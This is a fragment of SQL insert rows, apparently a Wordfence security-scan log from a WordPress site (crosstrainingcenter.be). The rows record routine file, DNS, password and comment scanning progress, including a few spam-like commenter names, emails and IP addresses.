(118174, 1492320250.184421, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(118175, 1492320250.964384, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(118176, 1492320251.655383, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(118087, 1492290933.253231, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(118086, 1492290933.001307, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(118025, 1492280431.120644, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117145, 1491767413.788436, 2, 'info', 'Starting password strength check on 3 users.'),
(117989, 1492280417.111075, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117990, 1492280417.304971, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117991, 1492280418.078675, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117992, 1492280418.558372, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(117575, 1492058789.078131, 2, 'info', 'Done URL check.'),
(117148, 1491767415.039708, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117576, 1492058789.090535, 2, 'info', 'Done file contents scan'),
(118026, 1492280431.990595, 2, 'info', 'Done host key check.'),
(116948, 1491702315.262297, 2, 'info', 'Scanned contents of 28 additional files at 27.69 per second'),
(117288, 1491886403.411314, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117289, 1491886404.802971, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(116949, 1491702316.277614, 2, 'info', 'Scanned contents of 41 additional files at 20.23 per second'),
(117294, 1491886407.512527, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117295, 1491886407.813124, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117296, 1491886407.872411, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117943, 1492265542.985578, 2, 'info', 'Starting password strength check on 3 users.'),
(118232, 1495637412.261090, 2, 'info', 'Scanning comment with Author: Chelsea Wallace Email: hqklgtrqgwh@fvrmaw.com Source IP: 81.171.81.234 '),
(117946, 1492265544.126504, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117200, 1491821931.641106, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117104, 1491767399.190569, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117103, 1491767398.846755, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117102, 1491767398.565648, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117101, 1491767398.215552, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117100, 1491767397.716284, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117099, 1491767397.358825, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(118010, 1492280425.984358, 2, 'info', 'Starting scan of file contents'),
(117081, 1491767391.022730, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117082, 1491767391.907387, 2, 'info', 'Getting plugin list from WordPress'),
(117083, 1491767392.068163, 2, 'info', 'Found 14 plugins'),
(117084, 1491767392.076499, 2, 'info', 'Getting theme list from WordPress'),
(117085, 1491767392.131421, 2, 'info', 'Found 4 themes'),
(117602, 1492058791.946313, 1, 'info', '-------------------'),
(117603, 1492058791.946782, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43891 records in 33 seconds.'),
(118011, 1492280427.111542, 2, 'info', 'Scanned contents of 27 additional files at 24.01 per second'),
(118012, 1492280428.223044, 2, 'info', 'Scanned contents of 39 additional files at 17.44 per second'),
(118013, 1492280429.285101, 2, 'info', 'Scanned contents of 86 additional files at 26.07 per second'),
(118014, 1492280429.287965, 2, 'info', 'Scanned contents of 86 additional files at 26.05 per second'),
(118015, 1492280429.288560, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117596, 1492058791.428211, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117094, 1491767395.762669, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117095, 1491767396.103520, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117096, 1491767396.423575, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117097, 1491767396.765648, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117098, 1491767397.083388, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(118134, 1492290942.755868, 1, 'info', '-------------------'),
(118135, 1492290942.756904, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44556 records in 27 seconds.'),
(118133, 1492290942.720591, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(117043, 1491750767.339717, 2, 'info', 'Done URL check.'),
(118097, 1492290934.836174, 10, 'info', 'SUM_START:Scanning file contents for infections and vulnerabilities'),
(117986, 1492280416.009392, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117987, 1492280416.317913, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117985, 1492280415.633519, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117984, 1492280415.260157, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117186, 1491821925.701428, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117184, 1491821925.107147, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117185, 1491821925.372183, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117538, 1492058773.572644, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117183, 1491821924.839731, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117626, 1492072410.730956, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117982, 1492280414.490925, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117983, 1492280414.827490, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117540, 1492058774.025212, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117539, 1492058773.814000, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(116968, 1491702320.202869, 2, 'info', 'Starting password strength check on 3 users.'),
(117771, 1492108252.873984, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117275, 1491886398.940250, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117276, 1491886399.291372, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117277, 1491886399.572694, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117894, 1492265527.080499, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117895, 1492265527.363531, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117896, 1492265527.732477, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117897, 1492265528.051836, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117569, 1492058787.257201, 2, 'info', 'Scanned contents of 81 additional files at 24.92 per second'),
(117568, 1492058786.198437, 2, 'info', 'Scanned contents of 39 additional files at 17.80 per second'),
(117159, 1491767415.216514, 1, 'info', '-------------------'),
(117160, 1491767415.223357, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43955 records in 34 seconds.'),
(117567, 1492058785.118303, 2, 'info', 'Scanned contents of 28 additional files at 25.19 per second'),
(117162, 1491767415.233064, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(117824, 1492193124.322762, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117825, 1492193124.638232, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117759, 1492108250.642111, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117281, 1491886400.905530, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117395, 1491943544.765756, 2, 'info', 'Done host key check.'),
(117278, 1491886399.924260, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117279, 1491886400.326996, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117280, 1491886400.692924, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117684, 1492072423.842626, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117683, 1492072423.839265, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117682, 1492072423.829861, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(118131, 1492290942.705937, 10, 'info', 'SUM_ENDOK:Scanning to check available disk space'),
(117695, 1492108217.682129, 1, 'info', 'Scheduled Wordfence scan starting at Thursday 13th of April 2017 06:30:17 PM'),
(117424, 1491943547.789546, 1, 'info', '-------------------'),
(117425, 1491943547.789965, 1, 'info', 'Scan Complete. Scanned 2410 files, 14 plugins, 4 themes, 11 pages, 145 comments and 43756 records in 28 seconds.'),
(117828, 1492193125.190994, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117195, 1491821929.057044, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117947, 1492265544.127556, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(118117, 1492290941.436337, 10, 'info', 'SUM_START:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(118118, 1492290941.533182, 10, 'info', 'SUM_ENDOK:Scanning comments for URL\'s in Google\'s Safe Browsing List'),
(117948, 1492265544.130159, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117949, 1492265544.145077, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117194, 1491821928.572418, 2, 'info', 'Analyzed 1200 files containing 16.57 MB of data so far'),
(118230, 1493417858.951838, 2, 'info', 'Scanning comment with Author: Elisa Brown Email: exhneloegrv@fqehdcymi.com Source IP: 205.185.209.130 '),
(118231, 1493417859.034577, 2, 'info', 'Checking 5 host keys against Wordfence scanning servers.'),
(117951, 1492265544.146018, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117950, 1492265544.145632, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117193, 1491821928.023667, 2, 'info', 'Analyzed 1100 files containing 15.03 MB of data so far'),
(117647, 1492072415.005511, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117648, 1492072415.161210, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117649, 1492072415.373755, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117650, 1492072415.395795, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117981, 1492280414.207158, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(117980, 1492280413.992245, 10, 'info', 'SUM_START:Scanning for known malware files'),
(117979, 1492280413.988584, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(117978, 1492280413.987919, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(117655, 1492072416.307469, 2, 'info', 'Starting scan of file contents'),
(117656, 1492072417.312043, 2, 'info', 'Scanned contents of 27 additional files at 26.97 per second'),
(117657, 1492072418.318610, 2, 'info', 'Scanned contents of 37 additional files at 18.43 per second'),
(117658, 1492072419.355622, 2, 'info', 'Scanned contents of 65 additional files at 21.35 per second'),
(117659, 1492072419.648399, 2, 'info', 'Scanned contents of 86 additional files at 25.77 per second'),
(117660, 1492072419.648875, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117661, 1492072419.652074, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117196, 1491821929.367479, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117197, 1491821929.595701, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117198, 1491821929.949009, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117199, 1491821930.347743, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(118104, 1492290938.775253, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117381, 1491943539.537198, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(116993, 1491750748.480521, 1, 'info', 'Contacting Wordfence to initiate scan'),
(116994, 1491750749.333955, 2, 'info', 'Getting plugin list from WordPress'),
(117504, 1491988781.493394, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117503, 1491988781.490932, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117502, 1491988781.490219, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118066, 1492290929.978600, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(117544, 1492058775.377868, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117791, 1492193111.771099, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117499, 1491988780.403220, 2, 'info', 'Starting password strength check on 3 users.'),
(118028, 1492280432.007951, 10, 'info', 'SUM_ENDOK:Scanning posts for URL\'s in Google\'s Safe Browsing List'),
(118027, 1492280431.991181, 2, 'info', 'Done examining URls'),
(117545, 1492058775.684144, 2, 'info', 'Analyzed 900 files containing 12.89 MB of data so far'),
(117546, 1492058776.052070, 2, 'info', 'Analyzed 1000 files containing 13.31 MB of data so far'),
(117132, 1491767412.678924, 2, 'info', 'Done URL check.'),
(117133, 1491767412.705122, 2, 'info', 'Done file contents scan'),
(117024, 1491750758.802614, 2, 'info', 'Analyzed 1900 files containing 30.52 MB of data so far'),
(117685, 1492072423.842962, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118085, 1492290932.824710, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117541, 1492058774.280066, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117028, 1491750761.436906, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117220, 1491821939.857681, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117221, 1491821940.700548, 2, 'info', 'Done URL check.'),
(117222, 1491821940.728268, 2, 'info', 'Done file contents scan'),
(118038, 1492280433.187469, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118039, 1492280433.187975, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118040, 1492280433.188939, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117226, 1491821940.807696, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117027, 1491750761.200217, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(117026, 1491750760.948140, 2, 'info', 'Analyzed 2100 files containing 33.38 MB of data so far'),
(117025, 1491750759.908265, 2, 'info', 'Analyzed 2000 files containing 32.64 MB of data so far'),
(117228, 1491821941.648959, 2, 'info', 'Done host key check.'),
(117227, 1491821940.809869, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117229, 1491821941.649551, 2, 'info', 'Done examining URls'),
(118041, 1492280433.191573, 10, 'info', 'SUM_ENDOK:Scanning DNS for unauthorized changes'),
(117528, 1492058769.611893, 2, 'info', 'Found 4 themes'),
(117526, 1492058769.552193, 2, 'info', 'Found 14 plugins'),
(117527, 1492058769.555456, 2, 'info', 'Getting theme list from WordPress'),
(118042, 1492280433.198645, 10, 'info', 'SUM_START:Scanning to check available disk space'),
(117524, 1492058768.614706, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117525, 1492058769.456780, 2, 'info', 'Getting plugin list from WordPress'),
(117049, 1491750767.426320, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118094, 1492290934.793434, 2, 'info', 'Analyzed 2411 files containing 37.68 MB of data.'),
(117048, 1491750767.425344, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117363, 1491943534.183636, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117364, 1491943534.370566, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117365, 1491943534.566478, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117366, 1491943534.752599, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117044, 1491750767.374963, 2, 'info', 'Done file contents scan'),
(118095, 1492290934.795075, 10, 'info', 'SUM_ENDOK:Comparing core WordPress files against originals in repository'),
(118096, 1492290934.799850, 10, 'info', 'SUM_ENDOK:Scanning for known malware files'),
(118132, 1492290942.709620, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(116962, 1491702319.849129, 2, 'info', 'Done host key check.'),
(116963, 1491702319.851648, 2, 'info', 'Done examining URls'),
(117766, 1492108251.646163, 2, 'info', 'Starting password strength check on 3 users.'),
(117259, 1491886393.377639, 1, 'info', 'Contacting Wordfence to initiate scan'),
(117260, 1491886394.271708, 2, 'info', 'Getting plugin list from WordPress'),
(117261, 1491886394.462826, 2, 'info', 'Found 14 plugins'),
(117262, 1491886394.466205, 2, 'info', 'Getting theme list from WordPress'),
(117263, 1491886394.571032, 2, 'info', 'Found 4 themes'),
(117770, 1492108252.872114, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(117769, 1492108252.871201, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118130, 1492290942.704386, 10, 'info', 'SUM_START:Scanning to check available disk space'),
(118129, 1492290942.699680, 10, 'info', 'SUM_ENDOK:Scanning DNS for unauthorized changes'),
(117204, 1491821934.216797, 2, 'info', 'Analyzed 2200 files containing 34.49 MB of data so far'),
(118123, 1492290942.687744, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118124, 1492290942.688367, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(118125, 1492290942.690259, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(118126, 1492290942.696345, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118127, 1492290942.696904, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118128, 1492290942.697224, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(118212, 1492320260.806505, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(118211, 1492320260.805518, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118210, 1492320260.804928, 10, 'info', 'SUM_START:Scanning DNS for unauthorized changes'),
(117507, 1491988781.505653, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117505, 1491988781.504656, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117506, 1491988781.505173, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117917, 1492265536.105072, 2, 'info', 'Analyzed 2413 files containing 37.68 MB of data.'),
(117383, 1491943540.032937, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(117384, 1491943540.052812, 2, 'info', 'Analyzed 2410 files containing 37.68 MB of data.'),
(118103, 1492290938.773453, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117617, 1492072407.499990, 2, 'info', 'Found 4 themes'),
(117460, 1491988767.465998, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117461, 1491988767.783891, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117462, 1491988767.994463, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117463, 1491988768.325890, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117464, 1491988768.662350, 2, 'info', 'Analyzed 1700 files containing 24.51 MB of data so far'),
(117465, 1491988769.943266, 2, 'info', 'Analyzed 1800 files containing 27.97 MB of data so far'),
(117106, 1491767400.146027, 2, 'info', 'Analyzed 1300 files containing 21.78 MB of data so far'),
(117008, 1491750753.198630, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117009, 1491750753.421021, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(118236, 1497408788.165362, 2, 'info', 'Scanning comment with Author: Sarah Hughes Email: ghfqfdsus@tqlqjagzcz.com Source IP: 196.52.32.11 '),
(118119, 1492290941.536714, 10, 'info', 'SUM_START:Scanning for weak passwords'),
(118120, 1492290941.537698, 2, 'info', 'Starting password strength check on 3 users.'),
(118121, 1492290942.668169, 10, 'info', 'SUM_ENDOK:Scanning for weak passwords'),
(118122, 1492290942.687227, 10, 'info', 'SUM_START:Scanning DNS for unauthorized changes'),
(117559, 1492058782.453999, 2, 'info', 'Analyzed 2300 files containing 34.88 MB of data so far'),
(117560, 1492058783.038004, 2, 'info', 'Analyzed 2400 files containing 37.51 MB of data so far'),
(118141, 1492320233.520096, 10, 'info', 'SUM_PAIDONLY:Check if your site is being Spamvertized is for paid members only'),
(117418, 1491943547.710171, 2, 'info', 'Scanning DNS MX record for crosstrainingcenter.be'),
(117591, 1492058791.418049, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(118022, 1492280431.034024, 10, 'info', 'SUM_ENDOK:Scanning files for URLs in Google\'s Safe Browsing List'),
(118021, 1492280431.030800, 10, 'info', 'SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),
(118019, 1492280431.004129, 2, 'info', 'Done URL check.'),
(118020, 1492280431.028389, 2, 'info', 'Done file contents scan'),
(118018, 1492280430.163039, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117588, 1492058790.236607, 2, 'info', 'Starting password strength check on 3 users.'),
(118017, 1492280430.161222, 2, 'info', 'Done host key check.'),
(118016, 1492280429.290020, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117109, 1491767400.991653, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117108, 1491767400.672147, 2, 'info', 'Analyzed 1500 files containing 22.67 MB of data so far'),
(117107, 1491767400.444909, 2, 'info', 'Analyzed 1400 files containing 22.37 MB of data so far'),
(117013, 1491750754.468363, 2, 'info', 'Analyzed 800 files containing 10.45 MB of data so far'),
(117011, 1491750753.881624, 2, 'info', 'Analyzed 600 files containing 6.21 MB of data so far'),
(117012, 1491750754.113024, 2, 'info', 'Analyzed 700 files containing 7.41 MB of data so far'),
(117010, 1491750753.660974, 2, 'info', 'Analyzed 500 files containing 4.95 MB of data so far'),
(117931, 1492265541.952396, 2, 'info', 'Done file contents scan'),
(118239, 1498328932.807493, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(118238, 1498328932.705047, 2, 'info', 'Scanning comment with Author: Ann Weaver Email: idllhldszt@gouxwnil.com Source IP: 205.185.209.188 '),
(117935, 1492265542.015611, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117936, 1492265542.016988, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117937, 1492265542.864279, 2, 'info', 'Done host key check.'),
(117938, 1492265542.864965, 2, 'info', 'Done examining URls'),
(118146, 1492320242.108195, 2, 'info', 'Getting plugin list from WordPress'),
(118147, 1492320242.320886, 2, 'info', 'Found 14 plugins'),
(118148, 1492320242.325524, 2, 'info', 'Getting theme list from WordPress'),
(118149, 1492320242.401145, 2, 'info', 'Found 4 themes'),
(118150, 1492320242.428639, 10, 'info', 'SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),
(118151, 1492320243.887912, 10, 'info', 'SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),
(117869, 1492193133.864250, 1, 'info', '-------------------'),
(117870, 1492193133.865086, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44193 records in 31 seconds.'),
(117150, 1491767415.047326, 2, 'info', 'Scanning DNS A record for crosstrainingcenter.be'),
(117149, 1491767415.044037, 2, 'info', 'Scanning CNAME DNS record for www.crosstrainingcenter.be'),
(118044, 1492280433.209292, 10, 'info', 'SUM_START:Scanning for old themes, plugins and core files'),
(117975, 1492280412.472192, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(117390, 1491943541.977046, 2, 'info', 'Scanned contents of 28 additional files at 26.95 per second'),
(117669, 1492072421.441390, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117237, 1491821943.370195, 2, 'info', 'Starting DNS scan for www.crosstrainingcenter.be'),
(117758, 1492108250.641222, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117748, 1492108248.830718, 2, 'info', 'Scanned contents of 86 additional files at 24.59 per second'),
(117749, 1492108248.831114, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117750, 1492108248.832154, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117751, 1492108249.723140, 2, 'info', 'Done host key check.'),
(117752, 1492108249.724242, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117753, 1492108250.573917, 2, 'info', 'Done URL check.'),
(117754, 1492108250.592078, 2, 'info', 'Done file contents scan'),
(117965, 1492280404.717965, 10, 'info', 'SUM_PAIDONLY:Checking if your IP is generating spam is for paid members only'),
(118098, 1492290934.845552, 10, 'info', 'SUM_START:Scanning files for URLs in Google\'s Safe Browsing List'),
(117021, 1491750756.834994, 2, 'info', 'Analyzed 1600 files containing 23.75 MB of data so far'),
(117566, 1492058784.004209, 2, 'info', 'Starting scan of file contents'),
(117837, 1492193129.272119, 2, 'info', 'Scanned contents of 86 additional files at 27.09 per second'),
(117838, 1492193129.275416, 2, 'info', 'Asking Wordfence to check URL\'s against malware list.'),
(117839, 1492193129.280701, 2, 'info', 'Checking 59 host keys against Wordfence scanning servers.'),
(117840, 1492193130.151500, 2, 'info', 'Done host key check.'),
(117841, 1492193130.152802, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117842, 1492193131.023686, 2, 'info', 'Done URL check.'),
(117843, 1492193131.040231, 2, 'info', 'Done file contents scan'),
(117847, 1492193131.292676, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117848, 1492193131.297776, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117849, 1492193132.147822, 2, 'info', 'Done host key check.'),
(117850, 1492193132.148298, 2, 'info', 'Done examining URls'),
(117855, 1492193132.253076, 2, 'info', 'Starting password strength check on 3 users.'),
(117405, 1491943546.548388, 2, 'info', 'Done examining URls'),
(117404, 1491943546.547075, 2, 'info', 'Done host key check.'),
(117663, 1492072420.509485, 2, 'info', 'Checking 1 URLs from 1 sources.'),
(117664, 1492072421.371898, 2, 'info', 'Done URL check.'),
(117665, 1492072421.392827, 2, 'info', 'Done file contents scan'),
(117977, 1492280413.987367, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(117976, 1492280413.977641, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(117174, 1491821921.444855, 2, 'info', 'Found 4 themes'),
(117792, 1492193112.619094, 2, 'info', 'Getting plugin list from WordPress'),
(117173, 1491821921.392377, 2, 'info', 'Getting theme list from WordPress'),
(117172, 1491821921.388689, 2, 'info', 'Found 14 plugins'),
(117793, 1492193112.647026, 2, 'info', 'Found 14 plugins'),
(117794, 1492193112.654556, 2, 'info', 'Getting theme list from WordPress'),
(117491, 1491988779.380584, 2, 'info', 'Examining URLs found in posts we scanned for dangerous websites'),
(117492, 1491988779.381422, 2, 'info', 'Checking 6 host keys against Wordfence scanning servers.'),
(117493, 1491988780.262521, 2, 'info', 'Done host key check.'),
(117494, 1491988780.262933, 2, 'info', 'Done examining URls'),
(117795, 1492193112.703884, 2, 'info', 'Found 4 themes'),
(118152, 1492320243.894129, 10, 'info', 'SUM_START:Fetching list of known malware files from Wordfence'),
(118153, 1492320245.399776, 10, 'info', 'SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),
(118154, 1492320245.409509, 10, 'info', 'SUM_START:Comparing core WordPress files against originals in repository'),
(118155, 1492320245.410023, 10, 'info', 'SUM_DISABLED:Skipping theme scan'),
(118156, 1492320245.410620, 10, 'info', 'SUM_DISABLED:Skipping plugin scan'),
(118157, 1492320245.412914, 10, 'info', 'SUM_START:Scanning for known malware files'),
(118158, 1492320245.840743, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
(118159, 1492320246.137939, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(118160, 1492320246.335319, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(118161, 1492320246.541168, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(118225, 1492320262.099076, 2, 'info', 'Wordfence used 56.53MB of memory for scan. Server peak memory usage was: 72.28MB'),
(118224, 1492320262.093970, 10, 'info', 'SUM_FINAL:Scan complete. You have 6 new issues to fix. See below.'),
(118223, 1492320262.093607, 1, 'info', 'Scan Complete. Scanned 2411 files, 14 plugins, 4 themes, 11 pages, 145 comments and 44711 records in 31 seconds.'),
(118222, 1492320262.093119, 1, 'info', '-------------------'),
(118221, 1492320260.841017, 10, 'info', 'SUM_ENDBAD:Scanning for old themes, plugins and core files'),
(117056, 1491750768.450014, 2, 'info', 'Starting password strength check on 3 users.'),
(117718, 1492108234.525514, 2, 'info', 'Analyzed 400 files containing 3.97 MB of data so far'),
(117717, 1492108233.841452, 2, 'info', 'Analyzed 300 files containing 3.26 MB of data so far'),
(117716, 1492108233.493960, 2, 'info', 'Analyzed 200 files containing 2.51 MB of data so far'),
(117715, 1492108233.158861, 2, 'info', 'Analyzed 100 files containing 1.02 MB of data so far'),
